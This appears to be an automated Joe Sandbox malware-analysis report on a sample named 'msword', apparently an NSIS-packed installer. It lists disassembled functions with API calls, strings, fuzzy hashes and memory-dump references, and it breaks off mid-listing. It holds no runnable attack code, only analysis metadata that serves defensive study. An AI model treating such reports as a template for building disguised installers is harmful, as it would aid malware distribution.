String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
detailprint: %s, xrefs: 00401679
CreateDirectory: "%s" (%d), xrefs: 004017BF
Call: %d, xrefs: 0040165A
Rename: %s, xrefs: 004018F8
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: "%s" created, xrefs: 00401849
BringToFront, xrefs: 004016BD
Rename failed: %s, xrefs: 0040194B
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Aborting: "%s", xrefs: 0040161D
SetFileAttributes failed., xrefs: 004017A1
Rename on reboot: %s, xrefs: 00401943
Jump: %d, xrefs: 00401602

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

"F, xrefs: 00405A4B
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
_Nb, xrefs: 00405AFD
@jG, xrefs: 00405AF2
RichEd32, xrefs: 00405BD4
F, xrefs: 00405A22
.DEFAULT\Control Panel\International, xrefs: 004059C5
.exe, xrefs: 00405A69
RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEd20, xrefs: 00405BC9
RichEdit, xrefs: 00405BF0

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,229,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,229,229,00000000,00000000,229,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user retry, xrefs: 00401B40
File: error, user abort, xrefs: 00401B53
File: error creating "%s", xrefs: 00401AF0
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user cancel, xrefs: 00401B93
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
229, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: 229$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2892758339
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Null, xrefs: 004036AA

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,004283D1,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB
API String ID: 651206458-3635341587
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(007EE200), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
229, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: 229$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-2572911037
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
229, xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
